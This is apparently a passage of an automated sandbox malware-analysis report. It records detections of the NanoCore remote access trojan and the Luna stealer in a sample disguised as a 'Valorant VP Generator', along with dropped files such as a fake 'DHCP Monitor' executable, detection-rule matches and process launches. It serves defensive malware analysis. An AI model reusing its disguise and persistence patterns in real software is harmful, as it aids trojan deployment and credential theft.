Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\ProgramData\output.exe, type: DROPPED	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: C:\ProgramData\nano.exe, type: DROPPED	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: C:\ProgramData\nano.exe, type: DROPPED	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\ProgramData\nano.exe, type: DROPPED	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Detected potential crypto function

Source: C:\ProgramData\nano.exe	Code function: 2_2_00A8524A	2_2_00A8524A
Source: C:\ProgramData\nano.exe	Code function: 2_2_011E7ABE	2_2_011E7ABE
Source: C:\ProgramData\nano.exe	Code function: 2_2_053B8918	2_2_053B8918
Source: C:\ProgramData\nano.exe	Code function: 2_2_053BB1E8	2_2_053BB1E8
Source: C:\ProgramData\nano.exe	Code function: 2_2_053B3850	2_2_053B3850
Source: C:\ProgramData\nano.exe	Code function: 2_2_053B2FA8	2_2_053B2FA8
Source: C:\ProgramData\nano.exe	Code function: 2_2_053B23A0	2_2_053B23A0
Source: C:\ProgramData\nano.exe	Code function: 2_2_053B9518	2_2_053B9518
Source: C:\ProgramData\nano.exe	Code function: 2_2_053B95DF	2_2_053B95DF
Source: C:\ProgramData\nano.exe	Code function: 2_2_053B306F	2_2_053B306F
Source: C:\ProgramData\output.exe	Code function: 5_2_00007FFC085B3551	5_2_00007FFC085B3551

Contains functionality to call native functions

Source: C:\ProgramData\nano.exe	Code function: 2_2_054D18D2 NtQuerySystemInformation,		2_2_054D18D2
Source: C:\ProgramData\nano.exe	Code function: 2_2_054D1897 NtQuerySystemInformation,		2_2_054D1897

Sample file is different than original file name gathered from version info

Source: 4Y85lSOUJ0.exe	Binary or memory string: OriginalFilename vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe, 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameoutput.exe4 vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe, 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameValorant VP Generator.exe, vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe, 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamevampire.dll4 vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe, 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameoutput.exe4 vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe, 00000000.00000002.287481820.0000000001140000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenamevampire.dll4 vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe	Binary or memory string: OriginalFilenameoutput.exe4 vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe	Binary or memory string: OriginalFilenameValorant VP Generator.exe, vs 4Y85lSOUJ0.exe

PE file contains strange resources

Source: 4Y85lSOUJ0.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 4Y85lSOUJ0.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: nano.exe.0.dr	Static PE information: Section: .rsrc ZLIB complexity 0.996271306818
Source: dhcpmon.exe.2.dr	Static PE information: Section: .rsrc ZLIB complexity 0.996271306818

Source: 4Y85lSOUJ0.exe	Virustotal: Detection: 73%
Source: 4Y85lSOUJ0.exe	ReversingLabs: Detection: 82%

Source: 4Y85lSOUJ0.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\4Y85lSOUJ0.exe "C:\Users\user\Desktop\4Y85lSOUJ0.exe"
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process created: C:\ProgramData\nano.exe "C:\ProgramData\nano.exe"
